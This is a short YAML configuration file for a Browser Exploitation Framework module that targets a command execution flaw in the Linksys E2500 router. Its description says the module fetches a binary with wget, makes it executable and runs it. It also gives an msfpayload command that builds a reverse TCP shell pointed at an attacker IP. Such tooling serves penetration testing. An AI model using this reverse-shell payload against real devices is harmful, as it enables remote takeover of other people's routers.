beef:
module:
linksys_e2500_shell:
enable: true
category: ["Exploits", "Router"]
name: "Linksys E2500 Shell"
description: "Attempts to exploit a command execution vulnerability on a Linksys E2500 router. <br> It will wget a binary payload to the temp directory, change permissions, and run the binary.<br>Command to generate payload: <b>msfpayload linux/mipsle/shell_reverse_tcp LHOST=[Attacker IP] X > reverse</b>"
authors: ["Esteban Rodriguez"]
target:
working: ["ALL"]